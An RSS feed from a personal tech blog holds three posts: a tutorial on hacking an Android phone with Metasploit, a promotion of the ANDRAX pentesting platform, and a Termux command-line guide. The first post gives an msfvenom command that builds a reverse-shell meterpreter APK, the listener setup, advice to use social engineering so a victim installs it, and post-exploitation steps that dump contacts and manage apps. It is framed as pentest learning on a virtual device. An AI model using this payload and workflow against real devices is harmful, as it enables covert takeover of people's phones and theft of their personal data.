<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>android Archives - Tech Chronicles</title>
	<atom:link href="http://kostacipo.stream/tag/android/feed/" rel="self" type="application/rss+xml" />
	<link>http://kostacipo.stream/tag/android/</link>
	<description>Ramblings of a Tech Dude</description>
	<lastBuildDate>Mon, 26 Oct 2020 00:45:18 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.8.2</generator>

<image>
	<url>https://kostacipo.stream/wp-content/uploads/2019/12/cropped-profile-32x32.jpg</url>
	<title>android Archives - Tech Chronicles</title>
	<link>http://kostacipo.stream/tag/android/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>How to Hack an Android Phone Using Metasploit Msfvenom in Kali Linux</title>
		<link>http://kostacipo.stream/how-to-hack-an-android-phone-using-metasploit-msfvenom-in-kali-linux/</link>
					<comments>http://kostacipo.stream/how-to-hack-an-android-phone-using-metasploit-msfvenom-in-kali-linux/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Mon, 26 Oct 2020 00:45:18 +0000</pubDate>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Mobile]]></category>
		<category><![CDATA[Pentesting]]></category>
		<category><![CDATA[android]]></category>
		<category><![CDATA[hacks]]></category>
		<category><![CDATA[mobile]]></category>
		<guid isPermaLink="false">http://www.kostacipo.stream/?p=1824</guid>

					<description><![CDATA[<p>In this article, we are going to learn how to hack an Android phone using Metasploit framework. Android devices are growing very fast worldwide and actually using a lot of the core capabilities of Linux systems. That is why choosing Android is the best way to learn Mobile Penetration Testing. Here we are using Kali [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/how-to-hack-an-android-phone-using-metasploit-msfvenom-in-kali-linux/">How to Hack an Android Phone Using Metasploit Msfvenom in Kali Linux</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="tdb-block-inner td-fix-index">
<p>In this article, we are going to learn how to hack an Android phone using <a href="https://www.metasploit.com/">Metasploit</a> framework. Android devices are growing very fast worldwide and actually using a lot of the core capabilities of Linux systems. That is why choosing Android is the best way to learn Mobile <a href="https://searchsecurity.techtarget.com/definition/penetration-testing">Penetration Testing</a>.</p>
<p>Here we are using Kali Linux to attack the target. The target has set to be an Android Phone and for that we are using an Android virtual machine. Of course, there are going to be some limitations and differences between a virtual Android and a physical Android device but for the purpose of learning pentesting it is recommended to conduct this test on a virtual device.</p>
<p>We will use msfvenom for creating a payload and save it as an apk file. After generating the payload, we need to setup a listener to Metasploit framework. Once the target downloads and installs the malicious apk then, an attacker can easily get back a meterpreter session on Metasploit. An attacker needs to do some social engineering to install apk on the victim’s mobile device.</p>
<h3><strong>Step by step Tutorial</strong></h3>
<h5><strong>Generating a Payload with msfvenom</strong></h5>
<p>At first, fire up the Kali Linux so that we may generate an apk file as a malicious payload. We need to check our local IP that turns out to be ‘192.168.0.112’. You can also hack an Android device through Internet by using your Public/External IP in the LHOST and by port forwarding.</p>
<p><img fetchpriority="high" decoding="async" class="aligncenter wp-image-6572 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/Generating-a-Payload-with-msfvenom.png" sizes="(max-width: 632px) 100vw, 632px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/Generating-a-Payload-with-msfvenom.png 632w, https://www.ehacking.net/wp-content/uploads/2020/04/Generating-a-Payload-with-msfvenom-300x161.png 300w" alt="Generating a Payload with msfvenom" width="632" height="340"></p>
<p>After getting your Local host IP use msfvenom tool that will generate a payload to penetrate the Android device. Type command:</p>
<p><strong># msfvenom –p android/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=4444 R&gt; /var/www/html/ehacking.apk</strong></p>
<p>Where:</p>
<ul>
<li><strong>-p</strong> indicates a payload type</li>
<li><strong>android/metepreter/reverse_tcp</strong> specifies a reverse meterpreter shell would come in from a target Android device</li>
<li><strong>LHOST </strong>is your local IP</li>
<li><strong>LPORT</strong> is set to be as a listening port</li>
<li><strong>R&gt; /var/www/html</strong> would give the output directly on apache server</li>
<li><strong>apk</strong> is the final name of the final output</li>
</ul>
<p>This would take some time to generate an apk file of almost ten thousand bytes.</p>
<p><img decoding="async" class="aligncenter wp-image-6573 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/msfvenom.png" sizes="(max-width: 631px) 100vw, 631px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/msfvenom.png 631w, https://www.ehacking.net/wp-content/uploads/2020/04/msfvenom-300x77.png 300w" alt="msfvenom" width="631" height="162"></p>
<h4><strong>Launching an Attack</strong></h4>
<p>Before launching attack, we need to check the status of the apache server. Type command:</p>
<p><strong># service apache2 status</strong></p>
<p><img decoding="async" class="aligncenter wp-image-6574 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/Launching-an-Attack.png" sizes="(max-width: 630px) 100vw, 630px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/Launching-an-Attack.png 630w, https://www.ehacking.net/wp-content/uploads/2020/04/Launching-an-Attack-300x160.png 300w" alt="Launching an Attack" width="630" height="337"></p>
<p>All seems set, now fire up msfconsole. Use multi/handler exploit, set payload the same as generated prevoisly, set LHOST and LPORT values same as used in payload and finally type exploit to launch an attack.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-6575 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/set-LHOST-and-LPORT.png" sizes="auto, (max-width: 648px) 100vw, 648px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/set-LHOST-and-LPORT.png 648w, https://www.ehacking.net/wp-content/uploads/2020/04/set-LHOST-and-LPORT-300x75.png 300w" alt="set LHOST and LPORT" width="648" height="162"></p>
<p>In real life scenarios, some social engineering techniques can be used to let the target download the malicious apk file. For demonstration we are just accessing the attacker machine to download the file in the Android device.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-6576 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/download-the-file-in-the-Android-device..png" sizes="auto, (max-width: 799px) 100vw, 799px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/download-the-file-in-the-Android-device..png 799w, https://www.ehacking.net/wp-content/uploads/2020/04/download-the-file-in-the-Android-device.-300x132.png 300w, https://www.ehacking.net/wp-content/uploads/2020/04/download-the-file-in-the-Android-device.-768x337.png 768w, https://www.ehacking.net/wp-content/uploads/2020/04/download-the-file-in-the-Android-device.-696x306.png 696w" alt="download the file in the Android device." width="799" height="351"></p>
<p>After downloading it successfully, select the app to install.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-6577 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/After-downloading-it-successfully-select-the-app-to-install..png" sizes="auto, (max-width: 519px) 100vw, 519px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/After-downloading-it-successfully-select-the-app-to-install..png 519w, https://www.ehacking.net/wp-content/uploads/2020/04/After-downloading-it-successfully-select-the-app-to-install.-300x173.png 300w" alt="After downloading it successfully, select the app to install." width="519" height="299"></p>
<p>So far, this option has been seen frequently when we try to install some third-party apps and normally users wont hesitate to allow the installation from unknown sources.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-6578 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/the-installation-from-unknown-sources..png" sizes="auto, (max-width: 799px) 100vw, 799px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/the-installation-from-unknown-sources..png 799w, https://www.ehacking.net/wp-content/uploads/2020/04/the-installation-from-unknown-sources.-300x164.png 300w, https://www.ehacking.net/wp-content/uploads/2020/04/the-installation-from-unknown-sources.-768x419.png 768w, https://www.ehacking.net/wp-content/uploads/2020/04/the-installation-from-unknown-sources.-696x380.png 696w, https://www.ehacking.net/wp-content/uploads/2020/04/the-installation-from-unknown-sources.-770x420.png 770w" alt="the installation from unknown sources." width="799" height="436">Enable the settings to install applications from the third-party sources. And finally hit the install option at the bottom.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-6579 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/Enable-the-settings-to-install-applications.png" sizes="auto, (max-width: 800px) 100vw, 800px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/Enable-the-settings-to-install-applications.png 800w, https://www.ehacking.net/wp-content/uploads/2020/04/Enable-the-settings-to-install-applications-300x246.png 300w, https://www.ehacking.net/wp-content/uploads/2020/04/Enable-the-settings-to-install-applications-768x630.png 768w, https://www.ehacking.net/wp-content/uploads/2020/04/Enable-the-settings-to-install-applications-696x571.png 696w, https://www.ehacking.net/wp-content/uploads/2020/04/Enable-the-settings-to-install-applications-512x420.png 512w" alt="Enable the settings to install applications " width="800" height="656">Once the user installs the application and runs it, the meterepreter session would be opened immediatly at the attacking side.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-6580 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/opened-immediatly.png" sizes="auto, (max-width: 634px) 100vw, 634px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/opened-immediatly.png 634w, https://www.ehacking.net/wp-content/uploads/2020/04/opened-immediatly-300x58.png 300w" alt="opened immediatly" width="634" height="123"></p>
<h4><strong>Post Exploitation </strong></h4>
<p>Type “background” and then “sessions” to list down all the sessions from where you can see all the IPs connected to the machine.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-6581 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/Post-Exploitation.png" sizes="auto, (max-width: 638px) 100vw, 638px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/Post-Exploitation.png 638w, https://www.ehacking.net/wp-content/uploads/2020/04/Post-Exploitation-300x113.png 300w" alt="Post Exploitation" width="638" height="240"></p>
<p>You can interact with any session by typing <strong>sessions -i [session ID]</strong></p>
<p>After entering the session, type “help” to list down all the commands we can put forward in this session.</p>
<p>You can see some file system commands that are helpful when you’re trying to go after some sensitive information or data. By using these, You can easily download or upload any file or information.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-6582 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/file-system-commands.png" sizes="auto, (max-width: 632px) 100vw, 632px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/file-system-commands.png 632w, https://www.ehacking.net/wp-content/uploads/2020/04/file-system-commands-300x191.png 300w" alt="file system commands" width="632" height="402">You will also find some network commands including portfwd and route</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-6583 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/portfwd.png" sizes="auto, (max-width: 629px) 100vw, 629px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/portfwd.png 629w, https://www.ehacking.net/wp-content/uploads/2020/04/portfwd-300x89.png 300w" alt="portfwd" width="629" height="186"></p>
<p>Some powerful system commands to get user ID, get a shell or getting the complete system information.</p>
<p>Type “app_list” and it will show you all the installed apps on the device</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-6584 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/Type-“app_list”-and-it-will-show-you-all-the-installed-apps-on-the-device.png" sizes="auto, (max-width: 628px) 100vw, 628px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/Type-“app_list”-and-it-will-show-you-all-the-installed-apps-on-the-device.png 628w, https://www.ehacking.net/wp-content/uploads/2020/04/Type-“app_list”-and-it-will-show-you-all-the-installed-apps-on-the-device-300x198.png 300w" alt="Type “app_list” and it will show you all the installed apps on the device" width="628" height="414">We also have the power to uninstall any app from the Android device</p>
<p><strong><img loading="lazy" decoding="async" class="aligncenter wp-image-6585 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/We-also-have-the-power-to-uninstall-any-app-from-the-Android-device.png" sizes="auto, (max-width: 631px) 100vw, 631px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/We-also-have-the-power-to-uninstall-any-app-from-the-Android-device.png 631w, https://www.ehacking.net/wp-content/uploads/2020/04/We-also-have-the-power-to-uninstall-any-app-from-the-Android-device-300x81.png 300w" alt="We also have the power to uninstall any app from the Android device" width="631" height="170"></strong></p>
<h4><strong>Extracting Contacts from an Android Device</strong></h4>
<p>Now let extract some contacts from the target device by typing “dump” and double tab</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-6586 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/Extracting-Contacts-from-an-Android-Device.png" sizes="auto, (max-width: 626px) 100vw, 626px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/Extracting-Contacts-from-an-Android-Device.png 626w, https://www.ehacking.net/wp-content/uploads/2020/04/Extracting-Contacts-from-an-Android-Device-300x19.png 300w" alt="Extracting Contacts from an Android Device" width="626" height="39">It will show all the options to extract from the device. Type “dump_contacts” and enter</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-6587 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/dump-contacts.png" sizes="auto, (max-width: 628px) 100vw, 628px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/dump-contacts.png 628w, https://www.ehacking.net/wp-content/uploads/2020/04/dump-contacts-300x35.png 300w" alt="dump_contacts" width="628" height="73">It will extract all the contacts from the Android device and will save it in our local directory. To see this file type “ls” and “cat [file_name]”</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-6588 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/cat-file_name.png" sizes="auto, (max-width: 624px) 100vw, 624px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/cat-file_name.png 624w, https://www.ehacking.net/wp-content/uploads/2020/04/cat-file_name-300x176.png 300w" alt="" width="624" height="367">This would show the content of the contact’s file earlier downloaded from the target device. This information is really sensitive and could be exploited by hackers.</p>
<p>There are lots of more commands available in meterpreter. Further try to explore and learn what we can perform with an Android device. This concludes that we have successfully penetrated the Android device using Kali Linux and Metasploit-Framework.</p>
<p>A healthy tip to secure your Android device is to not install any application from an unknown source, even if you really want to install it, try to read and examine its source code to get an idea whether this file is malicious or not.</p>
</div>
<p>The post <a href="http://kostacipo.stream/how-to-hack-an-android-phone-using-metasploit-msfvenom-in-kali-linux/">How to Hack an Android Phone Using Metasploit Msfvenom in Kali Linux</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/how-to-hack-an-android-phone-using-metasploit-msfvenom-in-kali-linux/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>ANDRAX v4 DragonFly &#8211; Penetration Testing on Android</title>
		<link>http://kostacipo.stream/andrax-v4-dragonfly-penetration-testing-on-android/</link>
					<comments>http://kostacipo.stream/andrax-v4-dragonfly-penetration-testing-on-android/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Wed, 18 Dec 2019 12:38:15 +0000</pubDate>
				<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[android]]></category>
		<category><![CDATA[pentest]]></category>
		<guid isPermaLink="false">http://www.kostacipo.stream/?p=1495</guid>

					<description><![CDATA[<p>&#160; ANDRAX is a&#160;Penetration Testing&#160;platform developed specifically for&#160;Android smartphones. ANDRAX has the ability to run natively on Android so it behaves like a common Linux distribution. But it is more powerful than a common distribution! The development of ANDRAX began on 08/09/2016 only for people in Brazil. ANDRAX has been fully redefined and reloaded on [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/andrax-v4-dragonfly-penetration-testing-on-android/">ANDRAX v4 DragonFly &#8211; Penetration Testing on Android</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>&nbsp;</p>
<div>ANDRAX is a&nbsp;Penetration Testing&nbsp;platform developed specifically for&nbsp;Android smartphones. ANDRAX has the ability to run natively on Android so it behaves like a common Linux distribution. But it is more powerful than a common distribution!</div>
<div></p>
<div class="default-play-size">The development of ANDRAX began on 08/09/2016 only for people in Brazil. ANDRAX has been fully redefined and reloaded on 05/10/2018, open to the international public.</p>
<p>ANDRAX can be deployed to all Android device with root access enabled and a good unlocked rom, where it becomes a weapon for advanced Penetration Testing.</p></div>
</div>
<div>&nbsp;</div>
<p><a name="more"></a><b>Why is Android so powerful?</b></p>
<div>Simple, everyone has a smartphone and spends all the time with it! We have the possibility to camouflage easily in the middle of everyone, the processor architecture of most Android smartphones is ARM a modern and robust architecture extremely superior to the rest, With touch screens we can run the tools with great agility and take advantage of the graphical interface of Android, we can get in almost anywhere with our smartphones&#8230;</div>
<div>&nbsp;</div>
<div>In technical terms, ANDRAX and <a href="https://en.wikipedia.org/wiki/NetHunter">NetHunter</a> should never be compared, ANDRAX is a penetration testing platform for Android smartphones and NetHunter is just a Debian emulator running with chroot.</div>
<div>&nbsp;</div>
<div>Termux is not our enemy, Termux is an application that allows installation of many Linux packages using a Debian environment running natively on Android.</div>
<div>ANDRAX and Termux have a similar development, ANDRAX and Termux share many libs and GNU/Linux resources.</div>
<div>&nbsp;</div>
<div>But Termux is not a penetration testing platform, it&#8217;s software to bring basic tools found in a Debian environment. Penetration tests are not something basic! But advanced techniques that involve advanced tools and a advanced environment to conduct good tests!</div>
<div>&nbsp;</div>
<div>So you can install many tools manually in Termux but it would be extremely difficult to optimize and configure them to take 100% of the required potential for penetration testing.</div>
<div>&nbsp;</div>
<div>Termux runs without root privileges and this makes it very difficult to use advanced tools.&nbsp;</div>
<p>ANDRAX promotes the use of more than 900 advanced tools for Hacking, Cracking and Penetration Testing.</p>
<p><b>Screenshots</b></p>
<div class="separator"><a href="https://1.bp.blogspot.com/-mOJeY2vM0DU/XeSFGXIzSaI/AAAAAAAAQ-0/1rAAVnl2JJ0Q5BVvYec8R-HPfVyy0efegCNcBGAsYHQ/s1600/andrax_dco1.png"><img loading="lazy" decoding="async" src="https://1.bp.blogspot.com/-mOJeY2vM0DU/XeSFGXIzSaI/AAAAAAAAQ-0/1rAAVnl2JJ0Q5BVvYec8R-HPfVyy0efegCNcBGAsYHQ/s640/andrax_dco1.png" data-original-height="1280" data-original-width="720" width="360" height="640" border="0"></a></div>
<p>&nbsp;</p>
<div class="separator"><a href="https://1.bp.blogspot.com/-ym3x2_Naw3k/XeSFGHDjEYI/AAAAAAAAQ-s/nqm57WRcktUGKA_6Rhxt6PxMe0SbsFlwgCNcBGAsYHQ/s1600/andrax_marina2.png"><img loading="lazy" decoding="async" src="https://1.bp.blogspot.com/-ym3x2_Naw3k/XeSFGHDjEYI/AAAAAAAAQ-s/nqm57WRcktUGKA_6Rhxt6PxMe0SbsFlwgCNcBGAsYHQ/s640/andrax_marina2.png" data-original-height="1280" data-original-width="720" width="360" height="640" border="0"></a></div>
<p>&nbsp;</p>
<div class="separator"><a href="https://1.bp.blogspot.com/-67qan4xH8vQ/XeSFGNxKgWI/AAAAAAAAQ-w/uTsnMJ6ebQQynlxlpfIdLucS9lsnck-swCNcBGAsYHQ/s1600/andrax_term2.png"><img loading="lazy" decoding="async" src="https://1.bp.blogspot.com/-67qan4xH8vQ/XeSFGNxKgWI/AAAAAAAAQ-w/uTsnMJ6ebQQynlxlpfIdLucS9lsnck-swCNcBGAsYHQ/s640/andrax_term2.png" data-original-height="1280" data-original-width="720" width="360" height="640" border="0"></a></div>
<p>&nbsp;</p>
<div class="separator"><a href="https://1.bp.blogspot.com/-X4muQU5TpOU/XeSFHAo00UI/AAAAAAAAQ-4/rzcZcMJDrj84x84XUgSwUBeovpDenXlcQCNcBGAsYHQ/s1600/andrax_tool1.png"><img loading="lazy" decoding="async" src="https://1.bp.blogspot.com/-X4muQU5TpOU/XeSFHAo00UI/AAAAAAAAQ-4/rzcZcMJDrj84x84XUgSwUBeovpDenXlcQCNcBGAsYHQ/s640/andrax_tool1.png" data-original-height="1280" data-original-width="720" width="360" height="640" border="0"></a></div>
<p>&nbsp;</p>
<div class="separator"><a href="https://1.bp.blogspot.com/-7wRdDSZ3I1s/XeSFHik3iiI/AAAAAAAAQ-8/wtNhD49F6ugAjWrDklkFuPe-1yhIMCZtgCNcBGAsYHQ/s1600/andrax_tool4.png"><img loading="lazy" decoding="async" src="https://1.bp.blogspot.com/-7wRdDSZ3I1s/XeSFHik3iiI/AAAAAAAAQ-8/wtNhD49F6ugAjWrDklkFuPe-1yhIMCZtgCNcBGAsYHQ/s640/andrax_tool4.png" data-original-height="1280" data-original-width="720" width="360" height="640" border="0"></a></div>
<p>More info in the <a href="https://andrax.thecrackertechnology.com/" target="_blank" rel="nofollow noopener noreferrer">official site</a>.</p>
<div style="text-align: center;"><b><a href="https://andrax.thecrackertechnology.com/download" target="_blank" rel="nofollow noopener noreferrer">Download ANDRAX</a></b></div>
<p>The post <a href="http://kostacipo.stream/andrax-v4-dragonfly-penetration-testing-on-android/">ANDRAX v4 DragonFly &#8211; Penetration Testing on Android</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/andrax-v4-dragonfly-penetration-testing-on-android/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>How to Use the Linux Command Line on Android With Termux</title>
		<link>http://kostacipo.stream/how-to-use-the-linux-command-line-on-android-with-termux/</link>
					<comments>http://kostacipo.stream/how-to-use-the-linux-command-line-on-android-with-termux/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Tue, 03 Dec 2019 10:34:29 +0000</pubDate>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Mobile]]></category>
		<category><![CDATA[android]]></category>
		<category><![CDATA[linux]]></category>
		<guid isPermaLink="false">http://www.kostacipo.stream/?p=1423</guid>

					<description><![CDATA[<p>&#160; Android is a capable operating system, as it offers many apps that approach desktop class. Yet sometimes, it takes a fair bit of effort to accomplish something on Android that would be a snap on a desktop. One solution is to take advantage of Android’s hidden Linux infrastructure. The Termux app provides a command [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/how-to-use-the-linux-command-line-on-android-with-termux/">How to Use the Linux Command Line on Android With Termux</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>&nbsp;</p>
<p>Android is a capable operating system, as it offers many apps that approach desktop class. Yet sometimes, it takes a fair bit of effort to accomplish something on Android that would be a snap on a desktop.</p>
<p>One solution is to take advantage of Android’s hidden Linux infrastructure. The Termux app provides a command line environment and allows you to install honest-to-goodness Linux apps on your Android device. Here’s how to use the Termux app.</p>
<h2>Why Use Termux?</h2>
<p>There are already some apps in the Play Store that are Android ports of Linux applications. These differ from Termux in that they replicate those Linux apps, but they’re made in an “Android way.”</p>
<p>In contrast, Termux is a self-contained Linux environment. Its programs are (for all intents and purposes) the same as their Linux counterparts. This conveys some advantages over the ported applications:</p>
<ul>
<li><strong>Consistency:</strong> Linux apps that have been ported to Android require a user interface of some kind. The user experience on Android largely depends on how much effort the developer puts into it. Conversely, Termux apps are the same as the Linux versions, from keyboard shortcuts to how you install them.</li>
<li><strong>Compactness:</strong> The addition of Android code can cause some slim applications to become heavy. For example, an Android SSH client might be anywhere from 2MB to 12MB in size. Compare this to Dropbear, available in Termux, which weighs in at 396KB (that’s kilobytes) installed. And it provides an SSH server too.</li>
</ul>
<p><img loading="lazy" decoding="async" class="aligncenter lazy-load" src="https://static.makeuseof.com/wp-content/uploads/2019/11/muo-android-termux-start.jpg" alt="Get a Linux command line on Android with Termux" data-src="//static.makeuseof.com/wp-content/uploads/2019/11/muo-android-termux-start.jpg" data-loaded="true" width="670" height="407"></p>
<ul>
<li><strong>Timeliness:</strong> When an application receives an update, you remain at the mercy of the Android app’s developer for an upgrade. In contrast, Termux applications are standard Linux packages that require less maintenance. They may even be created automatically alongside the desktop versions. You’re likely to get access to new features more quickly with Termux.</li>
<li><strong>Price:</strong> There is a chance any app you purchase from the Play Store will have a charge associated with it. All the apps in Termux are <a href="https://www.makeuseof.com/tag/open-source-vs-free-software/">free (and open source)</a>, as is Termux itself.</li>
</ul>
<h2>How to Use Termux</h2>
<p>Before diving in, understand that Termux is primarily a command line environment. There’s no fancy user interface with shiny buttons here. This goes not only for the base Termux package, but its apps as well. You won’t get the newest version of LibreOffice with this method.</p>
<p class="linked-out">Most importantly, you must be comfortable with the command line in order to install and use these programs on Termux. To develop some familiarity, check our list of the <a href="https://www.makeuseof.com/tag/most-used-linux-terminal-commands/">most-used Linux Terminal commands</a>.</p>
<p><span class="link-callout visible"> <span class="link-callout-image"> <span class="link-callout-image-container lazy-load" data-background-image="//static.makeuseof.com/wp-content/uploads/2017/01/most-used-linux-terminal-cmds-297x141.jpg" data-loaded="true"> <a href="https://www.makeuseof.com/tag/most-used-linux-terminal-commands/">40+ Most Used Linux Terminal Commands</a> </span> </span> <span class="link-callout-info"> <span class="link-callout-title"> <a href="https://www.makeuseof.com/tag/most-used-linux-terminal-commands/">40+ Most Used Linux Terminal Commands</a></span> <span class="link-callout-excerpt">Whether you&#8217;re just getting started or simply curious about the Linux terminal, here are the most common commands that will carry you through your entire time on Linux.</span> <a class="link-callout-link" href="https://www.makeuseof.com/tag/most-used-linux-terminal-commands/">Read More</a> </span> </span></p>
<p>When you’re ready, grab your phone or tablet and install Termux.</p>
<p><strong>Download:</strong> <a href="https://play.google.com/store/apps/details?id=com.termux" target="_blank" rel="noopener noreferrer">Termux</a> (Free)</p>
<h2>Basic Termux Commands You Should Know</h2>
<p>Launching Termux will drop you straight into a command line environment. From here, you can install new tools. Termux uses the same package installer as found in Debian, Ubuntu, and related Linux distros.</p>
<p>Advanced Packaging Tools (more commonly referred to as APT) is used to find, install, and remove software in Termux. Start off by updating packages and upgrading with these commands:</p>
<pre class=" language-bash"><code class=" language-bash">apt update

apt upgrade</code></pre>
<p><img loading="lazy" decoding="async" class="aligncenter lazy-load" src="https://static.makeuseof.com/wp-content/uploads/2019/11/muo-android-termux-update.jpg" alt="Update packages in the Termux command line" data-src="//static.makeuseof.com/wp-content/uploads/2019/11/muo-android-termux-update.jpg" data-loaded="true" width="670" height="408"></p>
<p>Next, find out what apps are available:</p>
<pre class=" language-bash"><code class=" language-bash">apt list</code></pre>
<p>To find out more about one of these packages, use</p>
<pre class=" language-bash"><code class=" language-bash">apt show <span class="token punctuation">[</span>package name<span class="token punctuation">]</span></code></pre>
<p>This will display the name, maintainer, file size, dependencies, and other useful details. To install an app, simply use:</p>
<pre class=" language-bash"><code class=" language-bash">apt <span class="token function">install</span> <span class="token punctuation">[</span>package name<span class="token punctuation">]</span></code></pre>
<p class="linked-out">Our <a href="https://www.makeuseof.com/tag/beginners-guide-installing-software-ubuntu-apt/">guide to using APT</a> will tell you more about this tool, such as how to upgrade packages. You can run an installed tool by entering its name at the Terminal prompt in the Termux command line.</p>
<p><span class="link-callout visible"> <span class="link-callout-image"> <span class="link-callout-image-container lazy-load" data-background-image="//static.makeuseof.com/wp-content/uploads/2016/11/beginner-ubuntu-apt-297x141.jpg" data-loaded="true"> <a href="https://www.makeuseof.com/tag/beginners-guide-installing-software-ubuntu-apt/">A Beginner&#8217;s Guide to Installing Software in Ubuntu with APT</a> </span> </span> <span class="link-callout-info"> <span class="link-callout-title"> <a href="https://www.makeuseof.com/tag/beginners-guide-installing-software-ubuntu-apt/">A Beginner&#8217;s Guide to Installing Software in Ubuntu with APT</a></span> <span class="link-callout-excerpt">If you&#8217;ve used Ubuntu you have probably used the apt command at some point. But did you know there&#8217;s so much more to it than apt-get install and apt-get upgrade?</span> <a class="link-callout-link" href="https://www.makeuseof.com/tag/beginners-guide-installing-software-ubuntu-apt/">Read More</a> </span> </span></p>
<p>In addition to apt, this list of built-in commands works in Termux on Android:</p>
<ul>
<li><code class=" language-bash"><span class="token function">cp</span></code> lets you copy a file</li>
<li><code class=" language-bash"><span class="token function">mv</span></code> will move a file</li>
<li><code class=" language-bash"><span class="token function">ls</span></code> lists the contents of a directory</li>
<li><code class=" language-bash"><span class="token function">rm</span></code> deletes (removes) data</li>
<li><code class=" language-bash"><span class="token function">ln</span></code> creates a symbolic link (for example, <code class=" language-bash"><span class="token function">ln</span> /data/data/com.termux/files/home/documents to /sdcard/Documents</code>)</li>
</ul>
<p>With these built-in tools, you reduce the need for an Android file manager. They also save you from having to root your phone to enjoy such functionality.</p>
<h2>Linux Apps You Can Install With the Termux Command Line</h2>
<p>Using <strong>apt</strong> with Termux, you can install several useful Linux apps on Android. These fall into several categories—let’s look at some of the highlights.</p>
<h3>Text Editors</h3>
<p>Termux provides recent versions of both popular Linux text editors: VIM and Emacs. Other editors, such as the minimalist nano, are also available.</p>
<p>Of course, Android has a lot of text editors already. So what do Emacs and Vim bring to the platform? Well, if you like to work in Markdown, both support it well. Into the “distraction-free” mindset? It doesn’t get much more distraction-free than VIM.</p>
